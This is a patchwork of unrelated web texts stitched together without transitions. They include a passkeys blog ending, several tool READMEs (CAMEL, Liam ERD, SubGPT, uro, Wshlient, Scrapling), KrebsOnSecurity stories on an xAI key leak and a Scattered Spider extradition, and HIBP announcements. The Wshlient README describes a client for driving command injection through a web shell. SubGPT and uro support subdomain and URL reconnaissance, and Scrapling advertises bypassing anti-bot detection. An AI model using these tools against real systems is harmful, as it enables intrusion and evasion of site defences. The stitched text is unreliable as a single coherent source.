This is a good point to reflect on the paradox that securing your digital life presents: as we seek stronger forms of authentication, we create different risks. Losing all your forms of non-phishable 2FA, for example, creates the risk of losing access to your account. But we also have mitigating controls: your digital passkey is managed totally independently of your physical one so the chances of losing both are extremely low. Plus, best practice is usually to have two U2F keys and enrol them both (I always take one with me when I travel, and leave another one at home). New levels of security, new risks, new mitigations.
All that's great, but beyond my examples above, who actually supports passkeys?! A rapidly expanding number of services, many of which 1Password has documented in their excellent passkeys.directory website:
Have a look through the list there, and you'll see many very familiar brands. You won't see Ubiquiti as of the time of writing, but I've gone through the "Suggest new listing" process to have them added and will be chatting further with the 1Password folks to see how we can more rapidly populate that list.
Do also take a look at the "Vote for passkeys support" tab and if you see a brand that really should be there, make your voice heard. Hey, here's a good one to start voting for:
I've deliberately just focused on the mechanics of passkeys in this blog post, but let me take just a moment to highlight important separate but related concepts. Think of passkeys as one part of what we call "defence in depth", that is the application of multiple controls to help keep you safe online. For example, you should still treat emails containing links with a healthy suspicion and whenever in doubt, not click anything and independently navigate to the website in question via your browser. You should still have strong, unique passwords and use a password manager to store them. And you should probably also make sure you're fully awake and not jet lagged in bed before manually entering your credentials into a website your password manager didn't autofill for you 🙂
We're not at the very beginning of passkeys, and we're also not yet quite at the tipping point either... but it's within sight. Just last week, Microsoft announced that new accounts will be passwordless by default, with a preference to using passkeys. Whilst passkeys are by no means perfect, look at what they're replacing! Start using them now on your most essential services and push those that don't support them to genuinely take the security of their customers seriously.
🐫 CAMEL is an open-source community dedicated to finding the scaling laws of agents. We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks. To facilitate research in this field, we implement and support various types of agents, tasks, prompts, models, and simulated environments.
The framework is designed to support systems with millions of agents, ensuring efficient coordination, communication, and resource management at scale.
Agents maintain stateful memory, enabling them to perform multi-step interactions with environments and efficiently tackle sophisticated tasks.
Every line of code and comment serves as a prompt for agents. Code should be written clearly and readably, ensuring both humans and agents can interpret it effectively.
We are a community-driven research collective comprising over 100 researchers dedicated to advancing frontier research in Multi-Agent Systems. Researchers worldwide choose CAMEL for their studies based on the following reasons.
✅ | Large-Scale Agent System | Simulate up to 1M agents to study emergent behaviors and scaling laws in complex, multi-agent environments. |
✅ | Dynamic Communication | Enable real-time interactions among agents, fostering seamless collaboration for tackling intricate tasks. |
✅ | Stateful Memory | Equip agents with the ability to retain and leverage historical context, improving decision-making over extended interactions. |
✅ | Support for Multiple Benchmarks | Utilize standardized benchmarks to rigorously evaluate agent performance, ensuring reproducibility and reliable comparisons. |
✅ | Support for Different Agent Types | Work with a variety of agent roles, tasks, models, and environments, supporting interdisciplinary experiments and diverse research applications. |
✅ | Data Generation and Tool Integration | Automate the creation of large-scale, structured datasets while seamlessly integrating with multiple tools, streamlining synthetic data generation and research workflows. |
Installing CAMEL is a breeze thanks to its availability on PyPI. Simply open your terminal and run:
pip install camel-ai
This example demonstrates how to create a ChatAgent
using the CAMEL framework and perform a search query using DuckDuckGo.
bash pip install 'camel-ai[web_tools]'
bash export OPENAI_API_KEY='your_openai_api_key'
```python from camel.models import ModelFactory from camel.types import ModelPlatformType, ModelType from camel.agents import ChatAgent from camel.toolkits import SearchToolkit
model = ModelFactory.create( model_platform=ModelPlatformType.OPENAI, model_type=ModelType.GPT_4O, model_config_dict={"temperature": 0.0}, )
search_tool = SearchToolkit().search_duckduckgo
agent = ChatAgent(model=model, tools=[search_tool])
response_1 = agent.step("What is CAMEL-AI?") print(response_1.msgs[0].content) # CAMEL-AI is the first LLM (Large Language Model) multi-agent framework # and an open-source community focused on finding the scaling laws of agents. # ...
response_2 = agent.step("What is the Github link to CAMEL framework?") print(response_2.msgs[0].content) # The GitHub link to the CAMEL framework is # https://github.com/camel-ai/camel. ```
For more detailed instructions and additional configuration options, check out the installation section.
After running, you can explore our CAMEL Tech Stack and Cookbooks at docs.camel-ai.org to build powerful multi-agent systems.
We provide a demo showcasing a conversation between two ChatGPT agents playing roles as a python programmer and a stock trader collaborating on developing a trading bot for stock market.
Explore different types of agents, their roles, and their applications.
Please reach out to us on CAMEL discord if you encounter any issue set up CAMEL.
Core components and utilities to build, operate, and enhance CAMEL-AI agents and societies.
Module | Description |
---|---|
Agents | Core agent architectures and behaviors for autonomous operation. |
Agent Societies | Components for building and managing multi-agent systems and collaboration. |
Data Generation | Tools and methods for synthetic data creation and augmentation. |
Models | Model architectures and customization options for agent intelligence. |
Tools | Tools integration for specialized agent tasks. |
Memory | Memory storage and retrieval mechanisms for agent state management. |
Storage | Persistent storage solutions for agent data and states. |
Benchmarks | Performance evaluation and testing frameworks. |
Interpreters | Code and command interpretation capabilities. |
Data Loaders | Data ingestion and preprocessing tools. |
Retrievers | Knowledge retrieval and RAG components. |
Runtime | Execution environment and process management. |
Human-in-the-Loop | Interactive components for human oversight and intervention. |
--- |
We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks.
Explore our research projects:
Research with US
We warmly invite you to use CAMEL for your impactful research.
Rigorous research takes time and resources. We are a community-driven research collective with 100+ researchers exploring the frontier research of Multi-agent Systems. Join our ongoing projects or test new ideas with us, reach out via email for more information.
![]()
For more details, please see our Models Documentation
.
Data (Hosted on Hugging Face)
Dataset | Chat format | Instruction format | Chat format (translated) |
---|---|---|---|
AI Society | Chat format | Instruction format | Chat format (translated) |
Code | Chat format | Instruction format | x |
Math | Chat format | x | x |
Physics | Chat format | x | x |
Chemistry | Chat format | x | x |
Biology | Chat format | x | x |
Dataset | Instructions | Tasks |
---|---|---|
AI Society | Instructions | Tasks |
Code | Instructions | Tasks |
Misalignment | Instructions | Tasks |
Practical guides and tutorials for implementing specific functionalities in CAMEL-AI agents and societies.
Cookbook | Description |
---|---|
Creating Your First Agent | A step-by-step guide to building your first agent. |
Creating Your First Agent Society | Learn to build a collaborative society of agents. |
Message Cookbook | Best practices for message handling in agents. |
Cookbook | Description |
---|---|
Tools Cookbook | Integrating tools for enhanced functionality. |
Memory Cookbook | Implementing memory systems in agents. |
RAG Cookbook | Recipes for Retrieval-Augmented Generation. |
Graph RAG Cookbook | Leveraging knowledge graphs with RAG. |
Track CAMEL Agents with AgentOps | Tools for tracking and managing agents in operations. |
Cookbook | Description |
---|---|
Data Generation with CAMEL and Finetuning with Unsloth | Learn how to generate data with CAMEL and fine-tune models effectively with Unsloth. |
Data Gen with Real Function Calls and Hermes Format | Explore how to generate data with real function calls and the Hermes format. |
CoT Data Generation and Upload Data to Huggingface | Uncover how to generate CoT data with CAMEL and seamlessly upload it to Huggingface. |
CoT Data Generation and SFT Qwen with Unsolth | Discover how to generate CoT data using CAMEL and SFT Qwen with Unsolth, and seamlessly upload your data and model to Huggingface. |
Cookbook | Description |
---|---|
Role-Playing Scraper for Report & Knowledge Graph Generation | Create role-playing agents for data scraping and reporting. |
Create A Hackathon Judge Committee with Workforce | Building a team of agents for collaborative judging. |
Dynamic Knowledge Graph Role-Playing: Multi-Agent System with dynamic, temporally-aware knowledge graphs | Builds dynamic, temporally-aware knowledge graphs for financial applications using a multi-agent system. It processes financial reports, news articles, and research papers to help traders analyze data, identify relationships, and uncover market insights. The system also utilizes diverse and optional element node deduplication techniques to ensure data integrity and optimize graph structure for financial decision-making. |
Customer Service Discord Bot with Agentic RAG | Learn how to build a robust customer service bot for Discord using Agentic RAG. |
Customer Service Discord Bot with Local Model | Learn how to build a robust customer service bot for Discord using Agentic RAG which supports local deployment. |
Cookbook | Description |
---|---|
Video Analysis | Techniques for agents in video data analysis. |
3 Ways to Ingest Data from Websites with Firecrawl | Explore three methods for extracting and processing data from websites using Firecrawl. |
Create AI Agents that work with your PDFs | Learn how to create AI agents that work with your PDFs using Chunkr and Mistral AI. |
For those who'd like to contribute code, we appreciate your interest in contributing to our open-source initiative. Please take a moment to review our contributing guidelines to get started on a smooth collaboration journey.🚀
We also welcome you to help CAMEL grow by sharing it on social media, at events, or during conferences. Your support makes a big difference!
For more information please contact camel-ai@eigent.ai
GitHub Issues: Report bugs, request features, and track development. Submit an issue
Discord: Get real-time support, chat with the community, and stay updated. Join us
X (Twitter): Follow for updates, AI insights, and key announcements. Follow us
Ambassador Project: Advocate for CAMEL-AI, host events, and contribute content. Learn more
@inproceedings{li2023camel,
title={CAMEL: Communicative Agents for "Mind" Exploration of Large Language Model Society},
author={Li, Guohao and Hammoud, Hasan Abed Al Kader and Itani, Hani and Khizbullin, Dmitrii and Ghanem, Bernard},
booktitle={Thirty-seventh Conference on Neural Information Processing Systems},
year={2023}
}
Special thanks to Nomic AI for giving us extended access to their data set exploration tool (Atlas).
We would also like to thank Haya Hammoud for designing the initial logo of our project.
We implemented amazing research ideas from other works for you to build, compare and customize your agents. If you use any of these modules, please kindly cite the original works: - TaskCreationAgent
, TaskPrioritizationAgent
and BabyAGI
from Nakajima et al.: Task-Driven Autonomous Agent. [Example]
PersonaHub
from Tao Ge et al.: Scaling Synthetic Data Creation with 1,000,000,000 Personas. [Example]
Self-Instruct
from Yizhong Wang et al.: SELF-INSTRUCT: Aligning Language Models with Self-Generated Instructions. [Example]
The source code is licensed under Apache 2.0.
Website • Documentation • Roadmap
Liam ERD generates beautiful, interactive ER diagrams from your database. Whether you're working on public or private repositories, Liam ERD helps you visualize complex schemas with ease.
Insert liambx.com/erd/p/
into your schema file's URL:
# Original: https://github.com/user/repo/blob/master/db/schema.rb
# Modified: https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb
👾^^^^^^^^^^^^^^^^👾
Run the interactive setup:
npx @liam-hq/cli init
If you find this project helpful, please give it a star! ⭐
Your support helps us reach a wider audience and continue development.
Check out the full documentation on the website.
See what we're working on and what's coming next on our roadmap.
SubGPT looks at subdomains you have already discovered for a domain and uses BingGPT to find more. Best part? It's free!
The following subdomains were found by this tool with these 30 subdomains as input.
call-prompts-staging.example.com
dclb02-dca1.prod.example.com
activedirectory-sjc1.example.com
iadm-staging.example.com
elevatenetwork-c.example.com
If you like my work, you can support me with as little as $1, here :)
pip install subgpt
git clone https://github.com/s0md3v/SubGPT && cd SubGPT && python setup.py install
cookies.json
Note: Any issues regarding BingGPT itself should be reported EdgeGPT, not here.
It is supposed to be used after you have discovered some subdomains using all other methods. The standard way to run SubGPT is as follows:
subgpt -i input.txt -o output.txt -c /path/to/cookies.json
If you don't specify an output file, the output will be shown in your terminal (stdout
) instead.
To generate subdomains and not resolve them, use the --dont-resolve
option. It's a great way to see all subdomains generated by SubGPT and/or use your own resolver on them.
An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.
Image: Shutterstock, @sdx15.
Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.
Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.
GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.
“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”
Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.
“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”
xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.
Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.
“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could it use for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”
The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.
The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.
“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.
Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.
A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.
Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.
“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”
I love a good road trip. Always have, but particularly during COVID when international options were somewhat limited, one road trip ended up, well, "extensive". I also love the recent trips Charlotte and I have taken to spend time with many of the great agencies we've worked with over the years, including the FBI, CISA, CCCS, RCMP, NCA, NCSC UK and NCSC Ireland. So, that's what we're going to do next month across some very cool locations in Europe:
Whilst the route isn't set in stone, we'll start out in Germany and cover Liechtenstein, Switzerland, France, Italy and Austria. We have existing relationships with folks in all but one of those locations (France, call me!) and hope to do some public events as we recently have at Oxford University, Reykjavik and even Perth back on (almost) this side of the world. And that's the reason for writing this post today: if you're in proximity of this route and would like to organise an event or if you're a partner I haven't already reached out to, please get in touch. We usually manage to line up a healthy collection of events and assuming we can do that again on this trip, I'll publish them to the events page shortly. There's also a little bit of availability in Dubai on the way over we'll put to productive use, so definitely reach out if you're over that way.
If you're in another part of the world that needs a visit with a handful of HIBP swag, let me know, there's a bunch of other locations on the short list, and we're always thinking about what's coming next 🌍
Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/
and /page/2/
- blog posts and similar human written content e.g. /posts/a-brief-history-of-time
- urls with same path but parameter value difference e.g. /page.php?id=1
and /page.php?id=2
- images, js, css and other "useless" files
The recommended way to install uro is as follows:
pipx install uro
Note: If you are using an older version of python, use
pip
instead ofpipx
The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.
cat urls.txt | uro
uro -i input.txt
If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.
uro -i input.txt -o output.txt
-w/--whitelist
)uro will ignore all other extensions except the ones provided.
uro -w php asp html
Note: Extensionless pages e.g. /books/1
will still be included. To remove them too, use --filter hasext
.
-b/--blacklist
)uro will ignore the given extensions.
uro -b jpg png js pdf
Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext
.
For granular control, uro supports the following filters:
http://example.com/page.php?id=
http://example.com/page.php
http://example.com/page.php
http://example.com/page
.jpg
which would be removed otherwisehttp://example.com/page/
Example: uro --filters hasexts hasparams
A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.
Scattered Spider is a loosely affiliated criminal hacking group whose members have broken into and stolen data from some of the world’s largest technology companies. Buchanan was arrested in Spain last year on a warrant from the FBI, which wanted him in connection with a series of SMS-based phishing attacks in the summer of 2022 that led to intrusions at Twilio, LastPass, DoorDash, Mailchimp, and many other tech firms.
Tyler Buchanan, being escorted by Spanish police at the airport in Palma de Mallorca in June 2024.
As first reported by KrebsOnSecurity, Buchanan (a.k.a. “tylerb”) fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. Buchanan was arrested in June 2024 at the airport in Palma de Mallorca while trying to board a flight to Italy. His extradition to the United States was first reported last week by Bloomberg.
Members of Scattered Spider have been tied to the 2023 ransomware attacks against MGM and Caesars casinos in Las Vegas, but it remains unclear whether Buchanan was implicated in that incident. The Justice Department’s complaint against Buchanan makes no mention of the 2023 ransomware attack.
Rather, the investigation into Buchanan appears to center on the SMS phishing campaigns from 2022, and on SIM-swapping attacks that siphoned funds from individual cryptocurrency investors. In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — including one-time passcodes for authentication and password reset links sent via SMS.
In August 2022, KrebsOnSecurity reviewed data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB called them by a different name — 0ktapus, because the group typically spoofed the identity provider Okta in their phishing messages to employees at targeted firms.
A Scattered Spider/0Ktapus SMS phishing lure sent to Twilio employees in 2022.
The complaint against Buchanan (PDF) says the FBI tied him to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous Okta-themed phishing domains seen in the campaign. The domain registrar NameCheap found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan from January 26, 2022 to November 7, 2022.
Authorities seized at least 20 digital devices when they raided Buchanan’s residence, and on one of those devices they found usernames and passwords for employees of three different companies targeted in the phishing campaign.
“The FBI’s investigation to date has gathered evidence showing that Buchanan and his co-conspirators targeted at least 45 companies in the United States and abroad, including Canada, India, and the United Kingdom,” the FBI complaint reads. “One of Buchanan’s devices contained a screenshot of Telegram messages between an account known to be used by Buchanan and other unidentified co-conspirators discussing dividing up the proceeds of SIM swapping.”
U.S. prosecutors allege that records obtained from Discord showed the same U.K. Internet address was used to operate a Discord account that specified a cryptocurrency wallet when asking another user to send funds. The complaint says the publicly available transaction history for that payment address shows approximately 391 bitcoin was transferred in and out of this address between October 2022 and
February 2023; 391 bitcoin is presently worth more than $26 million.
In November 2024, federal prosecutors in Los Angeles unsealed criminal charges against Buchanan and four other alleged Scattered Spider members, including Ahmed Elbadawy, 23, of College Station, Texas; Joel Evans, 25, of Jacksonville, North Carolina; Evans Osiebo, 20, of Dallas; and Noah Urban, 20, of Palm Coast, Florida. KrebsOnSecurity reported last year that another suspected Scattered Spider member — a 17-year-old from the United Kingdom — was arrested as part of a joint investigation with the FBI into the MGM hack.
Mr. Buchanan’s court-appointed attorney did not respond to a request for comment. The accused faces charges of wire fraud conspiracy, conspiracy to obtain information by computer for private financial gain, and aggravated identity theft. Convictions on the latter charge carry a minimum sentence of two years in prison.
Documents from the U.S. District Court for the Central District of California indicate Buchanan is being held without bail pending trial. A preliminary hearing in the case is slated for May 6.
Today, we're happy to welcome the Gambia National CSIRT to Have I Been Pwned as the 38th government to be onboarded with full and free access to their government domains. We've been offering this service for seven years now, and it enables national CSIRTs to gain greater visibility into the impact of data breaches on their respective nations.
Our goal at HIBP remains very straightforward: to do good things with data breaches after bad things happen. We hope this initiative helps support the Gambia National CSIRT as it has with many other governments around the world.
Web Shell Client
Wshlient
is a web shell client designed to be pretty simple yet versatile. One just need to create a text file containing an HTTP request and inform where Wshlient
inject the commands, then you can enjoy a shell.
In the case the above video does not works for you:
Out of python's included batteries Wshclient
only uses requests
. Just install it directly or using requirements.txt
:
$ git clone https://github.com/gildasio/wshlient
$ cd wshlient
$ pip install -r requirements.txt
$ ./wshlient.py -h
Alternatively you can also create a symbolic link in your $PATH
to use it directly anywhere in the system:
$ ln -s $PWD/wshlient.py /usr/local/bin/wshlient
$ ./wshlient.py -h
usage: wshlient.py [-h] [-d] [-i] [-ne] [-it INJECTION_TOKEN] [-st START_TOKEN] [-et END_TOKEN] req
positional arguments:
req File containing raw http request
options:
-h, --help show this help message and exit
-d, --debug Enable debug output
-i, --ifs Replaces whitespaces with $IFS
-ne, --no-url-encode Disable command URL encode
-it INJECTION_TOKEN, --injection-token INJECTION_TOKEN
Token to be replaced by commands (default: INJECT)
-st START_TOKEN, --start-token START_TOKEN
Token that marks the output beginning
-et END_TOKEN, --end-token END_TOKEN
Token that marks the output ending
You can contribute to Wshlient
by:
Feel free to do it, but keep in mind to keep it simple.
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.
Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!
Fetcher
class.PlayWrightFetcher
class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!StealthyFetcher
and PlayWrightFetcher
classes.from scrapling.fetchers import Fetcher
fetcher = Fetcher(auto_match=False)
# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))
# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above
# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]
# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...
# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)
To keep it simple, all methods can be chained on top of each other!
Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.
# | Library | Time (ms) | vs Scrapling |
---|---|---|---|
1 | Scrapling | 5.44 | 1.0x |
2 | Parsel/Scrapy | 5.53 | 1.017x |
3 | Raw Lxml | 6.76 | 1.243x |
4 | PyQuery | 21.96 | 4.037x |
5 | Selectolax | 67.12 | 12.338x |
6 | BS4 with Lxml | 1307.03 | 240.263x |
7 | MechanicalSoup | 1322.64 | 243.132x |
8 | BS4 with html5lib | 3373.75 | 620.175x |
As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.
Library | Time (ms) | vs Scrapling |
---|---|---|
Scrapling | 2.51 | 1.0x |
AutoScraper | 11.41 | 4.546x |
Scrapling can find elements with more methods and it returns full element Adaptor
objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.
All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.
pip3 install scrapling
Then run this command to install browsers' dependencies needed to use Fetcher classes
scrapling install
If you have any installation issues, please open an issue.
Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor
object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor
class to create an Adaptor
instance and start playing around with the page.
You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way
from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher
All of them can take these initialization arguments: auto_match
, huge_tree
, keep_comments
, keep_cdata
, storage
, and storage_args
, which are the same ones you give to the Adaptor
class.
If you don't want to pass arguments to the generated Adaptor
object and want to use the default values, you can use this import instead for cleaner code:
from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
then use it right away without initializing like:
page = StealthyFetcher.fetch('https://example.com')
Also, the Response
object returned from all fetchers is the same as the Adaptor
object except it has these added attributes: status
, reason
, cookies
, headers
, history
, and request_headers
. All cookies
, headers
, and request_headers
are always of type dictionary
.
[!NOTE] The
auto_match
argument is enabled by default which is the one you should care about the most as you will see later.
This class is built on top of httpx with additional configuration options, here you can do GET
, POST
, PUT
, and DELETE
requests.
For all methods, you have stealthy_headers
which makes Fetcher
create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries
for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher
methods is 3.
Hence: All headers generated by
stealthy_headers
argument can be overwritten by you through theheaders
argument
You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030
>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
For Async requests, you will just replace the import like below:
>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.
>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection') # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.
>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome
argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode
option.
Hence using the
real_chrome
argument requires that you have Chrome browser installed on your device
Add that to a lot of controlling/hiding options as you will see in the arguments list below.
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
>>> quote.tag
'div'
>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>
>>> quote.parent.tag
'div'
>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]
>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>
>>> quote.children.css_first(".author::text")
'Albert Einstein'
>>> quote.has_class('quote')
True
# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'
# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'
If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below
for ancestor in quote.iterancestors():
# do something with it...
